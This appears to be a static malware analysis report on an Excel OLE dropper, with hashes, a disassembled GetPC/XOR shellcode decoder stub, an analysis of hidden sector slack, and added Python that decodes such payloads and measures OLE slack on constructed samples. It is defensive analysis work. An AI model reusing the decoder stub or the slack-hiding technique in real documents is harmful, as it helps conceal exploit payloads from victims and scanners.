Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04e41abd5eb4d560…

MALICIOUS

Office (OLE)

Size: 154.3 KB (157,972 bytes)
Created: 2011-05-12 09:56:45
Authoring application: Microsoft Excel
First seen: 2015-09-19
MD5: 1993574629bfc9ef263227628b00fc70
SHA-1: 4c356814c33b849a98a66e1b1c10cfa9aa779e97
SHA-256: 04e41abd5eb4d5600693f0b82d1fcbff22928b18837c71b75d78615a6131a441
Risk score: 140

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-7370047-0. Heuristics indicate an exploit stub (a self-locating x86 GetPC sequence followed by a 16-bit XOR decoding loop) and a large slack region (81% of the file lies outside any declared stream), suggesting an attempt to hide shellcode inside the document rather than in a macro. The document body is heavily obfuscated and truncated, but the overall structure and the detection point towards a dropper designed to decode and execute a secondary payload.

Heuristics (3)

  • ClamAV: Xls.Dropper.Agent-7370047-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7370047-0
  • x86 GetPC stub (CALL $+5; POP EDI) high SC_GETPC_CALL
    CALL $+5 pushes the address of the next instruction and POP EDI retrieves it, which is how position-independent shellcode learns where it has been loaded. Here the recovered address is advanced by 0x29 and used as both source and destination of a loop that XORs 0x204 16-bit words with the key 0x3507, leaving words equal to 0 or to the key untouched: a decoder for a payload stored immediately after the loop.
    Disassembly
    Attempted x86 opcode disassembly of the region. The decoder runs from 0x51E to 0x54A; from 0x54C onward (0x523 + 0x29) the listing shows the XOR-encoded payload itself, which does not decode to meaningful instructions.
    0000051E  e800000000        call 0x523
    00000523  5f                pop edi
    00000524  83c729            add edi, 0x29
    00000527  66bb0735          mov bx, 0x3507
    0000052B  57                push edi
    0000052C  5e                pop esi
    0000052D  33c9              xor ecx, ecx
    0000052F  66b90402          mov cx, 0x204
    00000533  66ad              lodsw ax, word ptr [esi]
    00000535  6685c0            test ax, ax
    00000538  740e              je 0x548
    0000053A  668bd0            mov dx, ax
    0000053D  6633d3            xor dx, bx
    00000540  6685d2            test dx, dx
    00000543  7403              je 0x548
    00000545  668bc2            mov ax, dx
    00000548  66ab              stosw word ptr es:[edi], ax
    0000054A  e2e7              loop 0x533
    0000054C  52                push edx
    0000054D  beebb6eb75        mov esi, 0x75ebb6eb
    00000552  54                push esp
    00000553  635055            arpl word ptr [eax + 0x55], dx
    00000556  63be12050000      arpl word ptr [esi + 0x512], di
    0000055C  07                pop es
    0000055D  dca734000088      fsub qword ptr [edi - 0x77ffffcc]
    00000563  70f3              jo 0x558
    00000565  be45398c45        mov esi, 0x458c3945
    0000056A  1b988c4d0fbc      sbb ebx, dword ptr [eax - 0x43f0b274]
    00000570  7ad1              jp 0x543
    00000572  8c                .byte 0x8c
    00000573  723b              jb 0x5b0
    00000575  be53327f36        mov esi, 0x367f3253
    0000057A  d0                .byte 0xd0
    0000057B  be                .byte 0xbe
    0000057C  5d                pop ebp
    0000057D  15                .byte 0x15
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 157,972 bytes but its declared streams total only 29,612 bytes; the remaining 128,360 bytes (81%) live in sector slack that no declared stream accounts for. This is the classic hiding place for exploit-based (non-macro) Office payloads: XOR-encoded shellcode that a parser pointer-corruption bug in the document structure diverts execution into.
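The decoder loop from the GetPC heuristic above can be replayed outside the sample. The following Python is an added example, not part of the report or of any analysis tool: it locates the stub by its byte pattern, reads the three immediates out of it (payload displacement 0x29, XOR key 0x3507, word count 0x204) and emulates the loop over the bytes that follow, including its two pass-through cases (a zero word and a word equal to the key are stored unchanged). Because the analysed document is not reproduced here, the script runs against a constructed buffer that places the stub's own bytes at 0x51E in front of an encoded copy of some constructed text; only the stub bytes come from the listing, the payload and the file layout are assumptions.

```python
import re
import struct

# Byte pattern for the decoder stub as the report's listing disassembles it. The three
# immediates (payload displacement, XOR key, word count) are captured rather than hard-coded,
# so the same routine also works on other samples that reuse this stub with different values.
STUB_RE = re.compile(
    rb"\xe8\x00\x00\x00\x00"            # call $+5            (GetPC: pushes address of the POP)
    rb"\x5f"                            # pop edi             (edi = address of this POP)
    rb"\x83\xc7(?P<disp>.)"             # add edi, imm8       (payload = edi + imm8)
    rb"\x66\xbb(?P<key>..)"             # mov bx, imm16       (XOR key)
    rb"\x57\x5e"                        # push edi / pop esi  (esi = edi = payload)
    rb"\x33\xc9"                        # xor ecx, ecx
    rb"\x66\xb9(?P<count>..)"           # mov cx, imm16       (number of 16-bit words)
    rb"\x66\xad\x66\x85\xc0\x74\x0e"    # lodsw / test ax, ax / je store
    rb"\x66\x8b\xd0\x66\x33\xd3"        # mov dx, ax / xor dx, bx
    rb"\x66\x85\xd2\x74\x03"            # test dx, dx / je store
    rb"\x66\x8b\xc2"                    # mov ax, dx
    rb"\x66\xab"                        # store: stosw
    rb"\xe2\xe7",                       # loop
    re.DOTALL,
)


def find_decoders(data):
    """Return the runtime parameters of every copy of the stub found in data."""
    found = []
    for m in STUB_RE.finditer(data):
        pop_addr = m.start() + 5                          # the address CALL $+5 pushed
        disp = struct.unpack("<b", m.group("disp"))[0]    # imm8 of ADD is sign-extended
        found.append({
            "stub_offset": m.start(),
            "payload_offset": pop_addr + disp,
            "key": struct.unpack("<H", m.group("key"))[0],
            "count": struct.unpack("<H", m.group("count"))[0],
        })
    return found


def xor_words(buf, key):
    """Emulate one pass of the loop: a word equal to 0 or to the key is stored unchanged,
    every other word is XORed with the key. The transform is its own inverse, so it both
    encodes and decodes. A trailing odd byte (truncated file) is dropped."""
    out = bytearray()
    for (w,) in struct.iter_unpack("<H", buf[:len(buf) & ~1]):
        out += struct.pack("<H", w if w in (0, key) else w ^ key)
    return bytes(out)


def decode_payload(data, params):
    start = params["payload_offset"]
    return xor_words(data[start:start + 2 * params["count"]], params["key"])


# Constructed stand-in for the document (not the real sample): zero padding up to the
# offset the report shows, the stub bytes transcribed from the listing, then an encoded
# payload of exactly the length the stub expects (0x204 words). The plaintext contains a
# word equal to the key and zero padding so both pass-through cases are exercised.
STUB_BYTES = bytes.fromhex(
    "e800000000 5f 83c729 66bb0735 57 5e 33c9 66b90402 66ad 6685c0 740e"
    " 668bd0 6633d3 6685d2 7403 668bc2 66ab e2e7"
)
KEY = 0x3507
PLAINTEXT = (b"constructed payload!" + struct.pack("<H", KEY)).ljust(2 * 0x204, b"\x00")
SAMPLE = b"\x00" * 0x51E + STUB_BYTES + xor_words(PLAINTEXT, KEY) + b"\x00" * 64

if __name__ == "__main__":
    for p in find_decoders(SAMPLE):
        print({k: hex(v) for k, v in p.items()})
        print(decode_payload(SAMPLE, p)[:24])
```

On a real file, replace SAMPLE with the document's bytes; the stub search is offset-independent, so the file offset 0x51E in the listing is recovered from the match rather than assumed, and the decoded buffer is what to hand to a disassembler instead of the bytes the listing shows after 0x54C.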
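For the OLE slack heuristic, the following Python is an added example (not the report's own tooling) of how the numbers in that finding are derived: it parses the compound-file header, FAT and directory, sums the declared stream sizes, counts the sectors present in the file that the FAT does not mark as allocated, and reports the unaccounted share. Because the analysed file is not reproduced here, the script also builds a constructed minimal compound file with a single 'Workbook' stream and appends 20,480 bytes of unreferenced data to it; the layout and constants follow the [MS-CFB] compound file format, and the stream name and sizes are assumptions.

```python
import struct

MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
FATSECT, ENDOFCHAIN, FREESECT, NOSTREAM = 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF, 0xFFFFFFFF


def ole_accounting(data):
    """Compare what a compound file declares (stream sizes in the directory, sectors marked
    used in the FAT) with the bytes actually present. Only the 109 DIFAT slots in the
    header are followed, which covers FATs of up to 109 sectors."""
    if data[:8] != MAGIC:
        raise ValueError("not an OLE compound file")
    sector_size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    n_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)

    def sector(n):                       # sector 0 begins right after the header
        off = sector_size * (n + 1)
        return data[off:off + sector_size].ljust(sector_size, b"\xff")

    fat = []
    for s in difat[:n_fat]:
        fat.extend(struct.unpack(f"<{sector_size // 4}I", sector(s)))

    dir_bytes, s, seen = b"", first_dir, set()
    while s < len(fat) and s not in seen:  # ENDOFCHAIN ends the walk; seen stops FAT loops
        seen.add(s)
        dir_bytes += sector(s)
        s = fat[s]

    streams = {}
    for i in range(len(dir_bytes) // 128):
        e = dir_bytes[i * 128:(i + 1) * 128]
        name_len, etype = struct.unpack_from("<HB", e, 0x40)
        if etype != 2:                   # 2 = stream; 0 unused, 1 storage, 5 root
            continue
        name = e[:max(name_len - 2, 0)].decode("utf-16-le", "replace")
        size = struct.unpack_from("<Q", e, 0x78)[0]
        if sector_size == 512:           # version 3 files: only the low 32 bits are meaningful
            size &= 0xFFFFFFFF
        streams[name] = size

    sectors_in_file = -(-(len(data) - sector_size) // sector_size)
    allocated = sum(1 for i in range(sectors_in_file) if i < len(fat) and fat[i] != FREESECT)
    unallocated_bytes = (sectors_in_file - allocated) * sector_size
    return {
        "file_size": len(data),
        "streams": streams,
        "declared_stream_bytes": sum(streams.values()),
        "unallocated_bytes": unallocated_bytes,
        "unallocated_pct": round(100 * unallocated_bytes / len(data), 1),
    }


def build_sample_ole(stream_bytes, slack_bytes):
    """Constructed minimal version-3 compound file: header, one FAT sector, one directory
    sector (root entry plus a single 'Workbook' stream), the stream's sectors, then
    slack_bytes appended with no FAT or directory reference to them. stream_bytes must be
    at least 4096 bytes so it lives in regular sectors rather than the mini stream."""
    ss = 512
    n_sect = -(-len(stream_bytes) // ss)
    fat = [FREESECT] * (ss // 4)
    fat[0], fat[1] = FATSECT, ENDOFCHAIN                # sector 0 is the FAT, sector 1 the directory
    for i in range(n_sect):
        fat[2 + i] = 3 + i
    fat[1 + n_sect] = ENDOFCHAIN

    header = bytearray(ss)
    header[:8] = MAGIC
    struct.pack_into("<HHHHH", header, 0x18, 0x3E, 3, 0xFFFE, 9, 6)  # version 3, 512-byte sectors
    struct.pack_into("<II", header, 0x2C, 1, 1)                      # one FAT sector, directory at 1
    struct.pack_into("<III", header, 0x38, 4096, ENDOFCHAIN, 0)      # mini-stream cutoff, no mini FAT
    struct.pack_into("<II", header, 0x44, ENDOFCHAIN, 0)             # no extra DIFAT sectors
    struct.pack_into("<109I", header, 0x4C, 0, *([FREESECT] * 108))

    def entry(name, etype, child, start, size):
        e = bytearray(128)
        n = name.encode("utf-16-le")
        e[:len(n)] = n
        struct.pack_into("<HBB", e, 0x40, len(n) + 2, etype, 1)      # name length, type, colour
        struct.pack_into("<III", e, 0x44, NOSTREAM, NOSTREAM, child)  # left, right, child
        struct.pack_into("<IQ", e, 0x74, start, size)                # start sector, size
        return bytes(e)

    directory = entry("Root Entry", 5, 1, ENDOFCHAIN, 0) + entry("Workbook", 2, NOSTREAM, 2, len(stream_bytes))
    return (bytes(header) + struct.pack("<128I", *fat) + directory.ljust(ss, b"\x00")
            + stream_bytes.ljust(n_sect * ss, b"\x00") + slack_bytes)


# Constructed samples, not the file from the report: a 4,400-byte stream, with and without
# 40 trailing sectors (20,480 bytes) that nothing in the FAT or directory refers to.
SUSPICIOUS = build_sample_ole(b"BIFF" * 1100, b"\x90" * (40 * 512))
CLEAN = build_sample_ole(b"BIFF" * 1100, b"")

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("suspicious", SUSPICIOUS)):
        print(label, ole_accounting(blob))
```

On a real document call `ole_accounting(open(path, "rb").read())`. The stream-sum and the FAT-based count are both returned because they differ when hidden data sits inside allocated sectors (for example a stream whose declared size is much smaller than the chain holding it); a large gap under either measure is what this heuristic flags.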